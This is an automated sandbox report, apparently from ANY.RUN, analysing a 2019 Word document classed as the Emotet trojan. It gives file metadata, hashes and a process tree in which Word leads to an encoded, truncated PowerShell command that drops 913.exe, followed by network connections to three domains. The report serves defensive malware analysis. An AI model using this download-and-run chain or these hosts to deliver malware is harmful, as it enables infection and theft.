File name: | scan-M-094006471.doc |
Full analysis: | https://app.any.run/tasks/383c00e4-6f60-4f0d-823a-c8d06b063b72 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 14:32:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: PCI, Subject: Incredible, Author: Waldo Klein, Comments: 24/365 Taka Customer, Template: Normal.dotm, Last Saved By: Lauretta Heidenreich, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 07:25:00 2019, Last Saved Time/Date: Tue Oct 8 07:25:00 2019, Number of Pages: 1, Number of Words: 28, Number of Characters: 166, Security: 0 |
MD5: | 0D6182157DDF648D50A3FC03C0797555 |
SHA1: | AB4C5756DCCCFD38000FCD2E15F3AB0DA36A957C |
SHA256: | 5B830F40FA91C4A5D758B1E4AC3AC1F53E52030E6F87CB41B240855BF8D1A0DE |
SSDEEP: | 6144:2OsfUydILkI07NSU4jJnLATfDVbq9XSwcyv01f9L:2OsfUy8X07NSU4VkPVbq9XoR1f9L |
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Kling |
HeadingPairs: | - |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 193 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Larkin Group |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 166 |
Words: | 28 |
Pages: | 1 |
ModifyDate: | 2019:10:08 06:25:00 |
CreateDate: | 2019:10:08 06:25:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Lauretta Heidenreich |
Template: | Normal.dotm |
Comments: | 24/365 Taka Customer |
Keywords: | - |
Author: | Waldo Klein |
Subject: | Incredible |
Title: | PCI |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3048 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\scan-M-094006471.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | | |
1520 | powershell -enco […] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
PID | Process | Filename | Type |
---|---|---|---|
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4E2D.tmp.cvr | — |
MD5: — | SHA256: — | | |
1520 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UKV0Q7K71UH68T95CABA.temp | — |
MD5: — | SHA256: — | | |
1520 | powershell.exe | C:\Users\admin\913.exe | — |
MD5: — | SHA256: — | | |
3048 | WINWORD.EXE | C:\Users\admin\Desktop\~$an-M-094006471.doc | pgc |
MD5: C685A78A099551339DB0832DA9482294 | SHA256: A6B39DAFB5123E8B6892528FA053FD6D4AAF3E157C8645CFA3B153D38B26A752 | | |
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52C048DE.wmf | wmf |
MD5: C8F2ADA15E2D61AAACF02F1F170CA453 | SHA256: 77EAB27D30FA035FF2DE779CF4806A10835C16E48DEE68DDD44BB0152A88DF3A | | |
3048 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text |
MD5: 45CE4D891656A6268790ED31D4B57FE4 | SHA256: 1D203122C4CD46CA8668709DF59E576C1AFC7780F10A067411866EB5B47CD359 | | |
3048 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\scan-M-094006471.doc.LNK | lnk |
MD5: FF157D8BDE561D1D2E7CA6B82899C3BC | SHA256: E8C32A2542736210B87A9F0A43F3792888EFE43EB10A66DF625F1BBBD0C8944B | | |
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\487A0D72.wmf | wmf |
MD5: 4A7094FCE6F417A9E5482C9A1A301A3F | SHA256: 2494E8AB5E1E614C91DB77E3C1F838AA8DF1FC359BB411B05DBAF9F6E442CA78 | | |
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93DDB1A8.wmf | wmf |
MD5: C9CF6B0B3C8766ADA647939D5F478FCA | SHA256: EBCC4BD99978C9300E27A11AAAF914CD16C7D45BB5EE52B7D2411401D06CDCA0 | | |
3048 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\22CB1D83.wmf | wmf |
MD5: 61C63AF0E226B2A5E3B53ED9FA809DB2 | SHA256: B8FD375593737DC8C85AF8144A69EE600B21572B9AB26770D4E88F3C6D1BAB14 | | |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1520 | powershell.exe | 46.242.245.94:443 | norbertwaszak.pl | home.pl S.A. | PL | unknown |
1520 | powershell.exe | 104.31.87.181:443 | nguoibeo.info | Cloudflare Inc | US | shared |
1520 | powershell.exe | 162.144.125.199:80 | www.farmersmarket.qa | Unified Layer | US | unknown |
Domain | IP | Reputation |
---|---|---|
norbertwaszak.pl | | unknown |
nguoibeo.info | | unknown |
www.farmersmarket.qa | | unknown |